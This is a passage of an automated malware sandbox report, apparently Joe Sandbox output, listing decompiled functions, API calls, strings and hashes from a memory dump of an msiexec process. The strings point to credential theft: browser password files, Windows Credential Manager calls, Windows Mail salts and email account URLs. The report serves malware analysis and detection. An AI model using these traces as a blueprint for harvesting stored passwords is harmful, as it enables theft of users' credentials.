                                                                    • memset.MSVCRT ref: 0040A9BC
                                                                    • sprintf.MSVCRT ref: 0040A9F0
                                                                    • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                                    • sprintf.MSVCRT ref: 0040AABE
                                                                    • _mbscat.MSVCRT ref: 0040AAED
                                                                      • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                                    • sprintf.MSVCRT ref: 0040AB21
                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                    • API String ID: 710961058-601624466
                                                                    • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                    • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                    • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                    • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                    Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: sprintf$memset$_mbscpy
                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                    • API String ID: 3402215030-3842416460
                                                                    • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                    • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                    • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                    • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                    Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                      • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                      • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                      • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                      • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                      • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                    • strlen.MSVCRT ref: 0040F139
                                                                    • strlen.MSVCRT ref: 0040F147
                                                                    • memset.MSVCRT ref: 0040F187
                                                                    • strlen.MSVCRT ref: 0040F196
                                                                    • strlen.MSVCRT ref: 0040F1A4
                                                                    • memset.MSVCRT ref: 0040F1EA
                                                                    • strlen.MSVCRT ref: 0040F1F9
                                                                    • strlen.MSVCRT ref: 0040F207
                                                                    • _strcmpi.MSVCRT ref: 0040F2B2
                                                                    • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                    • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                    • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                    • API String ID: 2003275452-3138536805
                                                                    • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                    • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                    • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                    • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                    Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040C3F7
                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                    • strrchr.MSVCRT ref: 0040C417
                                                                    • _mbscat.MSVCRT ref: 0040C431
                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                    • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                    • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                    • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                    • API String ID: 1012775001-1343505058
                                                                    • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                    • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                    • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                    • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                    Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00444612
                                                                      • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                    • strlen.MSVCRT ref: 0044462E
                                                                    • memset.MSVCRT ref: 00444668
                                                                    • memset.MSVCRT ref: 0044467C
                                                                    • memset.MSVCRT ref: 00444690
                                                                    • memset.MSVCRT ref: 004446B6
                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                      • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                    • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                    • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                    • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                    • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset$strlen$_mbscpy
                                                                    • String ID: salu
                                                                    • API String ID: 3691931180-4177317985
                                                                    • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                    • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                    • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                    • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                    Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                    • API String ID: 2449869053-232097475
                                                                    • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                    • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                    • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                    • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                    Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • sprintf.MSVCRT ref: 0040957B
                                                                    • LoadMenuA.USER32(?,?), ref: 00409589
                                                                      • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                      • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                      • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                      • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                    • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                    • sprintf.MSVCRT ref: 004095EB
                                                                    • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                    • memset.MSVCRT ref: 0040961C
                                                                    • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                    • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                    • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                    • String ID: caption$dialog_%d$menu_%d
                                                                    • API String ID: 3259144588-3822380221
                                                                    • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                    • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                    • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                    • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                    Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                    • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                    • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                    • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                    • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                    • API String ID: 2449869053-4258758744
                                                                    • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                    • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                    • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                    • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                    Function 00443AAB Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 136stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                    • strlen.MSVCRT ref: 00443AD2
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 00443AE2
                                                                    • memset.MSVCRT ref: 00443B2E
                                                                    • memset.MSVCRT ref: 00443B4B
                                                                    • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                    • LocalFree.KERNEL32(?), ref: 00443C23
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                      • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                    Strings
                                                                    • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                    • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                    • Salt, xrefs: 00443BA7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _mbscpymemset$??2@??3@AddressByteCharFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                    • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                    • API String ID: 4030136668-2687544566
                                                                    • Opcode ID: 8d63d9ccfc49efb257c43273cbef49ec7928a411306aa0b1e98862e3d40e68ab
                                                                    • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                                                    • Opcode Fuzzy Hash: 8d63d9ccfc49efb257c43273cbef49ec7928a411306aa0b1e98862e3d40e68ab
                                                                    • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                                                    Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • wcsstr.MSVCRT ref: 0040426A
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                    • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                    • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                    • strchr.MSVCRT ref: 004042F6
                                                                    • strlen.MSVCRT ref: 0040430A
                                                                    • sprintf.MSVCRT ref: 0040432B
                                                                    • strchr.MSVCRT ref: 0040433C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                    • String ID: %s@gmail.com$www.google.com
                                                                    • API String ID: 3866421160-4070641962
                                                                    • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                    • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                    • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                    • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                    Function 00409731 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                                    • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                      • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                      • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                      • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                    • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                    • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                    • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                                    • memset.MSVCRT ref: 004097BD
                                                                    • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                    • String ID: TranslatorName$TranslatorURL$general$strings
                                                                    • API String ID: 1035899707-3647959541
                                                                    • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                    • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                    • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                    • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                    Function 0040CA30 Relevance: 18.1, APIs: 12, Instructions: 142windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                    • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                    • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                    • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                      • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                      • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                      • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                    • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                    • SetCursor.USER32(00000000), ref: 0040CB35
                                                                    • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                    • SetFocus.USER32(?), ref: 0040CB92
                                                                    • SetFocus.USER32(?), ref: 0040CC0B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                    • String ID:
                                                                    • API String ID: 1416211542-0
                                                                    • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                    • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                                    • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                    • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                                    Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                    • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                    • API String ID: 2360744853-2229823034
                                                                    • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                    • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                    • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                    • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                    Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • strchr.MSVCRT ref: 004100E4
                                                                    • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                      • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                    • _mbscat.MSVCRT ref: 0041014D
                                                                    • memset.MSVCRT ref: 00410129
                                                                      • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                      • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                    • memset.MSVCRT ref: 00410171
                                                                    • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                    • _mbscat.MSVCRT ref: 00410197
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                    • String ID: \systemroot
                                                                    • API String ID: 912701516-1821301763
                                                                    • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                    • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                    • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                    • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                    Function 004108E5 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                    • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                    • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                    • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                    • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                    Strings
                                                                    • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                    • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                    • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                    • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FromStringUuid$FreeTaskmemcpy
